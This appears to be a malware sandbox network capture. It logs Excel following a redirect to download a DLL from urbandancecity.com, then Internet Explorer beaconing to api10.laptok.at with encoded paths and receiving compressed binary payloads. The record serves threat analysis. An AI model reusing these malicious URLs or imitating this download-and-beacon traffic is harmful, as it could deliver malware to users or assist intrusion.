Feb 9, 2021 18:41:48.997062922 CET	53	61374	8.8.8.8	192.168.2.6
Feb 9, 2021 18:41:57.623142004 CET	50339	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:41:57.679775953 CET	53	50339	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:04.881876945 CET	63307	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:04.930968046 CET	53	63307	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:06.345839977 CET	49694	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:06.397499084 CET	53	49694	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:11.857353926 CET	54982	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:11.915786982 CET	53	54982	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:17.922410011 CET	50010	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:17.982613087 CET	53	50010	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:18.745208979 CET	63718	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:18.793952942 CET	53	63718	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:26.550574064 CET	62116	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:26.609859943 CET	53	62116	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:36.924678087 CET	63816	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:36.991856098 CET	53	63816	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:37.584804058 CET	55014	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:37.648559093 CET	53	55014	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:38.275429010 CET	62208	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:38.336774111 CET	53	62208	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:38.821417093 CET	57574	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:38.881702900 CET	53	57574	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:39.590432882 CET	51818	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:39.641513109 CET	53	51818	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:39.780750036 CET	56628	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:39.856774092 CET	53	56628	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:40.199032068 CET	60778	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:40.260950089 CET	53	60778	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:40.870405912 CET	53799	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:40.927604914 CET	53	53799	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:41.654792070 CET	54683	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:41.714569092 CET	53	54683	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:42.520677090 CET	59329	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:42.578167915 CET	53	59329	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:43.036566973 CET	64021	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:43.085257053 CET	53	64021	8.8.8.8	192.168.2.6
Feb 9, 2021 18:42:59.064851046 CET	56129	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:42:59.113509893 CET	53	56129	8.8.8.8	192.168.2.6
Feb 9, 2021 18:43:02.161782980 CET	58177	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:43:02.213485956 CET	53	58177	8.8.8.8	192.168.2.6
Feb 9, 2021 18:43:03.909801960 CET	50700	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:43:03.970237970 CET	53	50700	8.8.8.8	192.168.2.6
Feb 9, 2021 18:43:19.830799103 CET	54069	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:43:19.884351969 CET	53	54069	8.8.8.8	192.168.2.6
Feb 9, 2021 18:43:58.118815899 CET	61178	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:43:58.177479029 CET	53	61178	8.8.8.8	192.168.2.6
Feb 9, 2021 18:43:59.474664927 CET	57017	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:43:59.782507896 CET	53	57017	8.8.8.8	192.168.2.6
Feb 9, 2021 18:44:01.800584078 CET	56327	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:44:02.176213980 CET	53	56327	8.8.8.8	192.168.2.6
Feb 9, 2021 18:44:04.188833952 CET	50243	53	192.168.2.6	8.8.8.8
Feb 9, 2021 18:44:04.250488043 CET	53	50243	8.8.8.8	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 9, 2021 18:41:48.799129009 CET	192.168.2.6	8.8.8.8	0x2d88	Standard query (0)	urbandancecity.com	A (IP address)	IN (0x0001)
Feb 9, 2021 18:43:59.474664927 CET	192.168.2.6	8.8.8.8	0xf710	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 9, 2021 18:44:01.800584078 CET	192.168.2.6	8.8.8.8	0x46a2	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)
Feb 9, 2021 18:44:04.188833952 CET	192.168.2.6	8.8.8.8	0xa66d	Standard query (0)	api10.laptok.at	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Feb 9, 2021 18:41:48.997062922 CET	8.8.8.8	192.168.2.6	0x2d88	No error (0)	urbandancecity.com	192.185.16.102	A (IP address)	IN (0x0001)
Feb 9, 2021 18:43:59.782507896 CET	8.8.8.8	192.168.2.6	0xf710	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 9, 2021 18:44:02.176213980 CET	8.8.8.8	192.168.2.6	0x46a2	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)
Feb 9, 2021 18:44:04.250488043 CET	8.8.8.8	192.168.2.6	0xa66d	No error (0)	api10.laptok.at	35.228.31.40	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

139.162.190.91

api10.laptok.at

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.6	49727	139.162.190.91	80	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 18:41:48.621252060 CET	145	OUT	GET /campo/a/a HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: 139.162.190.91 Connection: Keep-Alive
Feb 9, 2021 18:41:48.785017967 CET	145	IN	HTTP/1.1 307 Temporary Redirect Date: Tue, 09 Feb 2021 17:41:48 GMT Server: Apache/2.4.29 (Ubuntu) Set-Cookie: ci_session=cgq0t24pplll8tat5jqrf51c4b83ka4g; expires=Tue, 09-Feb-2021 19:41:48 GMT; Max-Age=7200; path=/; HttpOnly Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Location: https://urbandancecity.com/wp-content/cache/stats/5fe/5bc/2200.dll Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.6	49755	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 18:43:59.877289057 CET	5422	OUT	GET /api1/_2B3EC16o/ZAwFGYF9Vidd2jOtlAgm/mFihH4UJ9WRC5w2li3g/OmibLsmZh5kJggmEaLzXRw/GA804i0H_2FW_/2Bkfn2No/zd0HyzP1MHF3zy0EvBK150W/_2B_2F72Dj/XoTXOXEzn6drW_2F_/2Bb7rN2KKcCZ/KiFeG39_2BW/irWAdzICnBHe9A/JQjcMLSav9jkNFGwHtKAG/2eL5LYIsSV49BFxc/6fK4w6t6KL1u4HS/P5vv5cRA4KCaKMNSZL/6ARUH9_2F/EAxxwtglWrZsl5pAsfsN/hmQH9PGx0xVYwlQOUAn/SkTHJd4lg4vDyhmkAnMXCm/mjKfMaxW9/ggDtMvzus/3j HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 9, 2021 18:44:00.279098034 CET	5423	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 09 Feb 2021 17:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b 35 92 e4 00 10 04 1f 24 43 4c a6 18 47 cc 9e 98 99 f5 fa db 73 27 36 46 31 ea ee aa 4c 63 4d 67 3a f4 21 1e 6d c3 9e bb fb 5b 4a 92 c2 7f 89 cb bb a7 60 4b 27 c2 42 e5 50 d2 1b 73 10 9a 1b de 8d 61 7e 09 26 10 d1 f5 60 7c ce f3 e9 0f f4 bc fc dc 59 7e 45 72 48 3a da a3 20 70 38 71 bd 97 2e b5 a9 80 d4 8f 49 55 68 51 82 37 10 a0 5e da d7 41 4e d4 75 0d 45 0e 82 d4 01 24 c3 b2 9b 05 4e d7 2d eb 27 55 cb 44 1f bb de ad 3f ba 47 ff 3e 5b 9c 11 e7 bc 23 06 b4 fd 93 9e ad f5 ca a7 e2 a1 62 75 76 60 14 98 fd 30 4c 5f 6b bf 36 14 f7 94 c0 e8 8a 65 2d 7f 8e 07 61 ca 34 82 52 be ce b0 c0 8f 57 a1 55 7c a3 fc d3 d0 82 bb 0f 24 9e d5 19 59 22 1c 5f 0f 26 94 d3 07 02 19 16 7d 23 ae 43 7f 66 0c 74 97 8a fa 37 4e 09 a6 8a 67 ae 94 e3 a4 87 44 22 c2 a8 dd 8f 4e 9c c3 3a 37 0d 49 fd 64 84 a6 f3 27 95 c3 2f 05 6c f4 0e 38 63 63 ad f3 4c 7b 07 93 f6 0d 17 f6 45 b3 21 7e b2 58 4a 83 6a c2 91 4e e5 f9 50 54 0e d4 02 bf a3 df 81 de 72 36 62 f2 84 f2 98 31 8d 9f d3 d0 43 19 c1 ad 27 c0 24 7b 3e 4b 4f ce ee e4 33 52 f6 35 7d f9 f5 af 73 5f 02 67 2e 83 27 cd ac 3a 8b 40 cd fb 8a 1c 51 ea 86 a6 e7 3a 99 0a d3 7b 09 a0 b1 6a 7c c4 27 76 a4 9e 9b e8 46 0d ab b2 12 d6 77 6e dd b2 b6 50 a4 3d e7 d9 e7 3d 10 d1 be 17 ab b3 9e d9 a2 27 c6 77 0b 79 41 95 04 41 10 8b e3 77 49 5d 4b 14 45 a5 e9 5e ab bb b3 90 86 82 5d 7b fd 2d c6 e7 e2 a1 43 79 e8 a6 6f c1 82 27 07 fa 6a d6 86 c9 d9 4f b5 ac 15 29 cc aa a4 18 80 12 c9 ee 25 0d d1 bc c1 9b 1e 49 3d f5 7b 3d db 18 49 65 64 70 58 6e 63 1f 3a 5b 78 e6 36 2e 92 93 92 47 c1 a9 c6 e7 31 59 39 fa c1 7c df e3 0c 9c 56 6a 59 2b ca 43 5f 77 5e 37 1a f0 80 5e e6 ba be 28 dd 1c 84 bc 4a 1e ac ca 82 1d 6f 93 27 6b c0 e4 34 99 0f 95 9c 07 2a f9 73 83 44 59 de c6 dd 85 32 0e b0 f6 81 9c 97 9f cb 67 34 40 57 3c 92 e4 ee 1f 3a 28 f2 cd cf a5 ec a4 99 5f 27 ce 6a 17 7d b8 3f 53 cc 11 6b 10 32 a7 06 d2 03 3f 71 d4 89 26 66 15 71 c0 e1 14 64 21 b9 4d 8e 61 3a ed 7a cc 48 d9 57 26 94 e4 90 97 47 8b f9 6c 91 0b 60 bf 15 50 e8 f0 ed 60 a0 ed d7 70 b6 05 f4 f5 1a 4c 63 b4 a3 a4 c9 4a d7 dc d7 b0 10 e5 e2 c0 b2 5f 40 b0 84 e0 86 d9 11 79 fe db 4d 62 11 d3 66 17 9c 48 4f 40 91 c9 e6 6d 2b ad ac d3 8b a4 62 f1 89 e3 93 4c b3 ea 2f 72 32 c5 5a 7b a9 0f 96 70 eb 58 bb 60 a6 fc 17 8b d0 4c 2e 31 6a bd 55 74 89 b8 f9 a0 32 f3 1d 12 9c 57 7e a1 f7 19 84 f0 2a cd f5 0e ee e7 69 3d 94 ca 0d bb cb da 9c e4 8e 46 cc 8b 6a 1b 0d 1a b9 bf 5a 6b 29 79 3f 03 af 30 70 54 8d fb 0c 36 55 7a 94 62 15 6b 61 7a 9a 88 e8 63 5c a1 1a ba ce 54 1e 4d 77 84 d7 b2 87 b9 cd 38 11 65 da 3a 80 5f 0f ff 32 95 f8 a8 9d 8f 45 cf 2b 99 f9 f3 af bd 4a 2c c3 dd 58 e0 35 39 7f d6 95 9b a0 a5 c1 f4 cc 19 02 7e 73 52 63 d7 23 f9 f8 8e 50 af 0f c5 34 11 ac 3b 43 46 6f ae ad 2c 9a 36 19 89 6e 03 d7 bd fa d9 d9 ae 5a 52 12 e1 6b 7b 57 f0 8d aa 3e 01 fa c9 5e 06 2c fb a9 48 ca 7c 27 7a 8a 0c 5e bb 2a 26 f7 c8 e7 ce f7 63 42 71 50 b4 20 98 bc ed fb a4 e4 99 29 88 7a dc 71 0c b3 92 79 c8 f3 77 e8 ff a6 bb b0 4a 76 11 f2 8f 32 ef 42 a2 3a 71 f3 ef 48 12 70 c4 37 b1 9f ea 77 f8 48 6f 8a bb 05 28 d6 a4 87 b9 42 60 b2 fe 08 c0 62 9c c0 e1 15 e0 ad 5a 54 55 Data Ascii: 20005$CLGs'6F1LcMg:!m[J`K'BPsa~&`\|Y~ErH: p8q.IUhQ7^ANuE$N-'UD?G>[#buv`0L_k6e-a4RWU\|$Y"_&}#Cft7NgD"N:7Id'/l8ccL{E!~XJjNPTr6b1C'${>KO3R5}s_g.':@Q:{j\|'vFwnP=='wyAAwI]KE^]{-Cyo'jO)%I={=IedpXnc:[x6.G1Y9\|VjY+C_w^7^(Jo'k4sDY2g4@W<:(_'j}?Sk2?q&fqd!Ma:zHW&Gl`P`pLcJ_@yMbfHO@m+bL/r2Z{pX`L.1jUt2W~i=FjZk)y?0pT6Uzbkazc\TMw8e:_2E+J,X59~sRc#P4;CFo,6nZRk{W>^,H\|'z^*&cBqP )zqywJv2B:qHp7wHo(B`bZTU
Feb 9, 2021 18:44:00.279128075 CET	5424	IN	Data Raw: dc 70 bd 9f 12 6d 16 e5 6f 30 b8 a2 ca 50 fa 3b 68 1c 79 fa 26 ef 04 c9 b6 c9 8a 01 a3 2a 11 b6 ab 12 85 ca f8 b5 0b 1d 7e 6a 6d 0a b9 e3 7c bd 8b f8 b2 71 2d d0 0a 72 d2 d8 9e 2c 82 32 1b 44 95 a3 2b 9b f6 a6 f0 93 d7 bb 4e 6d fc 4e 1b 56 af 31 Data Ascii: pmo0P;hy&~jm\|q-r,2D+NmNV1mLe7OS<7+r-`Y<&}7aqB-{GQCbX]{H_^r\|,9pr5xf,AvGd{td38SH_R4v%v*(QO%\|
Feb 9, 2021 18:44:00.279177904 CET	5426	IN	Data Raw: 7c 2c 22 64 56 e7 c8 5c d2 db d4 b1 64 e8 c8 99 8c 5e 5b 43 a2 ec 48 ea 29 d3 00 01 e8 20 ef a7 35 da c7 a9 d9 0b d4 47 0f c7 5e 18 ac be b5 39 98 b9 ea 93 f1 42 66 fa 8e 1e e3 b3 08 b7 56 c3 29 cf 3a e3 f4 8d 2a ae ff 86 fd 8e 51 fe 54 44 69 66 Data Ascii: \|,"dV\d^[CH) 5G^9BfV):QTDifEwi'.?,}1[9<>t\|lN)%frN!gb6iE):Rhng!(Wt/o/}jJ$#6-w${bZ?q~ "R-T#V
Feb 9, 2021 18:44:00.279195070 CET	5427	IN	Data Raw: cf fa bf 1f 6f 34 3b 6b f5 f9 7c 25 c3 3d 8d 89 5d 33 95 82 45 53 4e fd f5 38 a7 12 2c f7 6c 23 18 eb 27 06 f1 9a c0 91 7d 1f 05 9d 0a 42 bf 63 ec 94 ce a5 f8 12 47 6c c7 24 77 4d b1 14 0b ec c6 2b 66 1a e1 cc 3e d1 2f 42 72 6b 68 fc 91 4e 4a f6 Data Ascii: o4;k\|%=]3ESN8,l#'}BcGl$wM+f>/BrkhNJy Hu{oY"dc{&VK.hmX~ZCL-UVoR[w!('\Gn'A17\WFW@!/M>Y24>H`Y
Feb 9, 2021 18:44:00.279210091 CET	5428	IN	Data Raw: 7a 6d 2c 24 3b 2b 7c 96 af cd 36 c2 5c 7c 08 ec aa 84 00 63 6f 9c fb ee c2 6c c2 af fc b9 98 b2 77 e7 10 dc af c2 02 76 9c 7c 11 88 2e a6 b4 95 00 89 08 a9 7b 66 33 8f 6a 64 68 94 71 96 c8 ed cc 31 99 e1 ac f6 48 33 97 bc 11 d4 67 ce bc a7 c0 f7 Data Ascii: zm,$;+\|6\\|colwv\|.{f3jdhq1H3gP;&}s"zvaR:m&5U c+@bO=Gx@y+3[?!3&-Ut=LZ7)>xyVUi>Y5a9@4~v?l>@{M$
Feb 9, 2021 18:44:00.279227018 CET	5430	IN	Data Raw: 5d 84 e7 38 2e 33 8b de 55 2f 5d 9b 87 1b c8 41 40 8d c3 2b 9f de 4f 62 ff d6 43 b8 7c 5c 68 20 d9 22 c5 3c ae da af b3 b6 4f d4 07 99 f5 e2 cc 36 8f 0d 85 f6 a0 9a 08 df e1 b0 70 29 14 c9 f9 a2 47 a7 d9 83 57 6a 9c 91 cc d4 41 cf 17 f8 db bc 2f Data Ascii: ]8.3U/]A@+ObC\|\h "<O6p)GWjA/uukBJYmx3B>o)WJ{k@j5ufEiRO}/5Jwq/*S^FN0?IvU\|6d9dWh?w.8doJ
Feb 9, 2021 18:44:00.318919897 CET	5431	IN	Data Raw: 3b 41 56 c3 79 6d e0 3c 6c 13 1c 9e ce 19 0b 10 a8 67 4e 67 fd d0 f5 aa dc 15 f2 33 d6 6a 78 dd 20 b4 58 ec 6b 3b 62 eb 5d ad 0b 47 5c 0a d5 17 c9 ec 77 77 dc 8e 2d f6 73 ba 22 d6 36 b8 4d ce 4d 99 2d c0 01 94 e8 95 2d f8 5f 46 a4 66 f3 1e c7 5c Data Ascii: ;AVym<lgNg3jx Xk;b]G\ww-s"6MM--_Ff\UA\j~5s?<*G=LjQI5uIBr~^Cx+_YR2gXG?]eRVx^O6(9U2#6lsorFOp}Qs9pr<-6e_rt
Feb 9, 2021 18:44:00.318947077 CET	5433	IN	Data Raw: d7 70 5d d5 39 0b dc 37 29 09 49 57 75 3c 20 9e 05 26 39 b6 86 18 55 24 78 84 71 0b bc 01 c5 7f bf e3 5e ff 72 0c ab 34 59 30 d3 6f d6 c9 37 39 34 ec c9 26 0d bb c9 66 52 2a c6 69 2e a1 8f 95 e3 15 a9 b1 18 8d 8c 07 60 01 57 65 06 8b 97 b3 e1 7f Data Ascii: p]97)IWu< &9U$xq^r4Y0o794&fRi.`We4`mX[^'h+o?NO?R+r(MOI!tj"3\|8A')j7C8MYVxip&
Feb 9, 2021 18:44:00.318964958 CET	5434	IN	Data Raw: e1 af 51 b8 68 53 4e ed d8 2b 65 14 a2 7d 63 0a 14 90 b5 f0 73 76 ee 1c e7 19 b4 35 30 81 30 05 cc a6 cd bf c0 5b 03 85 34 67 21 40 60 e1 e1 00 23 e4 14 26 47 aa 8f a5 f9 c8 23 f0 c3 57 a1 28 1c 5a 59 47 71 ee 4c aa fd b9 ad 30 1f 57 5f 60 88 7a Data Ascii: QhSN+e}csv500[4g!@`#&G#W(ZYGqL0W_`zQF1B_z4R_ xT{?1$[7$=a/D$tI*/Xy#AO\|yp]D4l5u?4y43'>FoY9\)_X?Bgz
Feb 9, 2021 18:44:00.318980932 CET	5435	IN	Data Raw: 2d 95 66 11 29 26 da bb c8 7a b0 f0 81 bf 5e ac 1a 89 06 c0 08 6b 23 30 e0 2c 71 6a 15 95 00 58 6b 84 b0 20 b5 0a 19 6c d0 be 93 99 97 6d 16 09 5a fa 44 61 c9 74 1f f7 89 fb fd a1 e1 b2 38 53 6a b6 50 ec a6 55 9e e5 d4 f7 12 20 a8 9c 84 6c ab 43 Data Ascii: -f)&z^k#0,qjXk lmZDat8SjPU lCMlP^A$??,`d%wY`X/?BimMF4^a:rL>o@OX#mkrAmz-$0. 89h6".zL3?
Feb 9, 2021 18:44:00.355074883 CET	5437	IN	Data Raw: 6d 1e e7 f6 aa ed 4f 65 b0 8a 21 39 3f fa 96 19 fd 27 4b d1 c2 29 90 d7 2f 31 0f d9 5a 6c 54 a9 f5 94 43 b9 a0 bb 83 76 7f 3c d7 ea 93 bb 1f 6d f2 26 32 5b 46 7b 6b 5a a7 28 50 a2 a1 ee ee 0b c5 3a 9c 31 69 19 b3 9f 1d df a5 3c 96 4c f6 04 55 3c Data Ascii: mOe!9?'K)/1ZlTCv<m&2[F{kZ(P:1i<LU<')$0sSYf=S>\|1I2{+9@\F9la~Yuj)<F>rYd6C~$5 3h4bmrOlT\|QG"Bb Diq8m4*Gg'

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49756	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 18:44:00.765930891 CET	5634	OUT	GET /favicon.ico HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Host: api10.laptok.at Connection: Keep-Alive
Feb 9, 2021 18:44:00.867918015 CET	5634	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 09 Feb 2021 17:44:00 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49757	35.228.31.40	80	C:\Program Files (x86)\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 9, 2021 18:44:02.256082058 CET	5635	OUT	GET /api1/7tidwRkCPNkyKHRu/sM7SqYc7lDPAe2Y/LxU4hPUrQ8DyLrlP8w/Nv_2FoafN/Gi3x5QhAhJwP6RZeuOE3/JqQwpPFp6P_2Bgw1Ow4/YQbUpkvF6g4Fdj4IZHGtNs/drxOxsX9ra8ze/alAzZjOu/wfTEPlwQzX9RKEQJf5J8q2h/QY5MtTc_2B/fN9jwgMPnCxXHk4JM/h48AsZ0sO93u/BNd8Zp5c15S/_2FwZ_2FDNtvXf/0udmkslKsSD_2BqfUIpZ3/CB9K3mpzjq1wwzDp/YFrr1SvQi2fLHme/2BwbHda90Wbf3bIygC/3yPHqi_2B/qHeLcZQp_2BFoaOMMJJ4/L9wxE1UCA/P HTTP/1.1 Accept: text/html, application/xhtml+xml, image/jxr, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: api10.laptok.at Connection: Keep-Alive
Feb 9, 2021 18:44:02.714838982 CET	5637	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 09 Feb 2021 17:44:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=63072000; includeSubdomains X-Content-Type-Options: nosniff Content-Encoding: gzip Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9a b5 82 ab 50 14 45 3f 88 02 b7 12 77 77 3a 2c b8 4b 80 af 7f 99 d7 4e 91 84 7b cf d9 7b ad 4c 78 aa b8 96 b1 c2 7a 8d 94 53 ca ab 0c 78 c0 97 0c 8c 1c 1b 61 97 1b 0f 41 dd 42 42 bf c9 b9 2f 61 9c 79 c1 4e a5 50 f4 9f 91 34 5d e9 e2 ba f5 74 88 02 d3 d7 0a 2b 86 1a a5 94 ee 3e a9 70 d4 87 92 18 d4 2f c9 8b e6 c2 3a 4a 94 a8 96 4f b7 b9 c7 ba 75 5b b8 12 ac 6b 2a 8b 25 7d a0 97 94 a1 7b b4 7e 26 75 04 ca af 69 51 11 16 38 2b 93 d8 d6 67 67 68 47 23 fd 38 88 52 81 97 6b f7 72 5a d2 3c c9 ad ca c1 68 80 25 80 1d 94 77 a5 e1 43 42 d1 c2 a0 9e 86 8f 70 73 33 43 34 52 92 0a 36 51 e6 40 a8 27 c3 ac 2f bd 59 db cd a2 70 ab 4d 05 23 89 d4 b1 42 42 14 07 66 fe a9 93 0e d2 4f e2 b3 5f ef a9 08 94 e0 09 5e 97 0c 5b f1 a6 a8 eb 89 ee 40 06 dd e2 23 4f e2 65 51 7a 78 8c 75 de de 8e d5 1d 4b 25 1e 5d dc 74 bc 52 32 07 41 91 b2 43 cb f2 d5 3b 9a 61 9f af 94 6a fa dc 2f 5a 23 6d 00 19 2a 37 84 7e 99 35 d0 5f ea 8a ac f6 e9 e3 eb 53 ea cd d7 54 78 a2 0b 8b 71 16 b1 5c d7 79 c1 e3 13 07 a9 ae f3 2d e4 44 2e 01 62 14 36 c7 6e f7 10 b5 07 6e fb 32 e8 6d 63 3a df 4b 05 60 75 52 cd cf c2 1d 7c d0 8a 0d db c8 94 60 b1 20 76 08 9c 92 56 df 37 32 08 f7 d6 42 c9 79 ed cc ba 13 df 54 38 89 bc 43 62 04 b5 a3 39 60 8d bd 33 b5 47 eb 5a 12 0d 3e 7b 6a c1 2d 54 d8 f6 c6 34 88 e7 e1 29 6b 51 19 c6 15 f3 bd a2 47 a6 37 1c fd 7e d5 59 8f 5a 43 09 13 be 8d c3 c4 4a 0c 72 d3 55 51 28 8c 94 a1 b3 cf e6 ba e1 ce 0c 45 ec 53 73 87 4e b3 39 b2 2a 9c 1a 0d 4f dc 90 8a 34 d0 cb 13 6d 75 62 28 4c 02 6c 5c 34 5b 50 06 05 9b f3 49 09 d8 2f e4 eb d1 42 42 8a 09 27 ca 13 a3 76 b7 f0 6d ae 58 ea f3 62 fb 83 3d 11 ee c1 d3 f8 69 4d db dc 5a 86 d1 f8 4b 10 b1 0c fe cd e5 9c 32 ec 5a 8c 6d 77 7f f9 29 d3 00 82 7b 73 5e d8 8c 1a dd d6 d1 23 6a a8 10 e0 a2 af ce f4 4c 6c 14 3a ef 7e 01 38 78 c7 0a 5e 24 bb a1 ee ca 4d af bc 2e 04 4d 76 98 ea d2 d6 69 c1 31 15 2e 0f be 55 c3 41 62 da 23 81 58 c0 6c 36 ca 71 e3 08 c9 1d d3 02 8d 35 1d 25 30 38 ff c4 5d 10 ec ba 73 2f b9 f0 9b bf 94 5c dc c7 0b 8b 5a 76 10 07 53 e9 e7 bb 0b a4 ed 8a 1d 86 6f 81 da 55 ca b2 87 90 16 66 53 19 a7 0a b7 66 95 78 92 d7 4b bb 38 e8 4d 09 7c 6c 86 c4 0a ba 01 45 a9 f1 92 5c 87 bd c1 82 21 9e 68 df 18 78 91 15 75 c1 2d ca b6 f3 59 06 25 8e 7b 56 11 87 58 a9 60 99 7c 13 30 66 eb 0c 0f c1 a4 d4 c3 88 a7 93 7c db 1e 8a a3 b0 d3 72 68 76 7e 46 4b f5 08 47 17 4a 23 20 36 6f 8a a4 66 11 71 79 3a e8 c7 91 c7 29 bb 82 6f 51 50 ab b2 89 8f f2 25 09 65 58 a5 c8 2c 01 9a f3 61 f3 93 af 44 32 3a 30 9c c8 04 fd be c1 27 98 e3 92 19 44 f8 54 01 44 ae 4d 92 54 af f4 46 81 e2 1b 2d 5c b4 8c fc db 75 fe ea ac 33 58 b8 a4 3e b9 f6 14 94 09 bf 83 bb 36 d3 d5 fe 06 b0 59 af df 5c 50 b9 f1 8b e0 13 4e 61 1e 10 7c 9e 0d b3 5b ce 36 13 fa a0 97 09 95 94 18 d9 e2 83 f8 8c 8d 84 75 df 11 a4 98 a1 b1 1e 75 12 25 92 ff 48 06 1a a2 eb 40 f9 03 e7 66 6d ad dc 27 2c 99 4c 71 96 14 06 9c 24 c5 d7 17 cf 7b 84 7f f5 5c e1 b6 23 67 25 e0 7e 6a e0 88 7e 13 1d 39 f0 53 30 af fd d3 2c 79 c7 97 67 6d ae 12 90 5c 64 ce fc e6 04 c2 cf 7c f8 f2 f0 c5 b2 3d e7 ec b7 5e 1b 0d 80 6f 0c e4 72 93 9d 21 84 3d 8c 5c 09 ae 45 fb Data Ascii: 